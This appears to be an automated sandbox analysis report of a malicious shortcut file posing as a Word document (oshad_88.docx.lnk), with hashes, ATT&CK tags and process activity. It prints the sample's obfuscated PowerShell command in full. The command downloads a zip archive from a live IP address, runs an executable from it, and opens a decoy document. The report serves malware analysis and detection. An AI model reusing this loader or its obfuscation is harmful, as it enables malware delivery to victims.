50b628bc603d846c04ab5dc56a5bc40b32b219c29211661f663ec7bb160a0554

Analysis

max time kernel
118s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
07-09-2024 01:16

Target

oshad_88.docx.lnk
Size

15KB
MD5

64a52682aa182ab4a0e2cebaeaad3f17
SHA1

372c0fdf264c4204b490e11717e51d4ffd97b694
SHA256

9549f73133514942aadfcf6f3f38f5d89e573ba7d9b18cde44f29f0a172d7c32
SHA512

21dab4c078f34e63677eed29a80f240e0d9687e91a4868f6fa812ede45aec7133242c3c5fa9a324b1ca9040407a4c584ffc820c4617efd712314821a6bc2e5b4
SSDEEP

48:88muavUQSIuvZujofxvUZ7HEVxCTI2evUZ7vUqbbudCZZGXu/dZZIa7x:88y81vZiofxHVxCTIRVqeuqQ

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2336	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2336	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 2336	2956	cmd.exe	29
PID 2956 wrote to memory of 2336	2956	cmd.exe	29
PID 2956 wrote to memory of 2336	2956	cmd.exe	29

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo VkGdaYkxoSDqagAIMUSqWeFFKWBdyoLFWRVEvjodFocYsOlZlDgEkQa; echo VhNVdmCjPvnIlvvpkwnxlfeIqZy; echo UwsGnhMnhQixhmuGlsBMAPSDKSsWQDTvdxNCBxsgEjgUchAAbOiaDRD; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo EYBUMEUtkQyUZiebvxwQgurwULNqqzvPMqEGDCvesKCkTRWVCRwLrUXxdJ; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo DaHNXRcvYEIwZocbzUwYQhKQphrgcaAkqoP; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/oshad_88.docx -OutFile oshad_88.docx; echo vKOMValDMwyQRtxOaMEdppITpcmMluNArXmDGCX; s''t''a''rt oshad_88.docx
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2336

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2336-38-0x000007FEF554E000-0x000007FEF554F000-memory.dmp

Filesize
4KB

Download
memory/2336-39-0x000000001B580000-0x000000001B862000-memory.dmp

Filesize
2.9MB

Download
memory/2336-40-0x0000000002850000-0x0000000002858000-memory.dmp

Filesize
32KB

Download
memory/2336-41-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2336-42-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2336-43-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2336-44-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2336-45-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download
memory/2336-46-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

Filesize
9.6MB

Download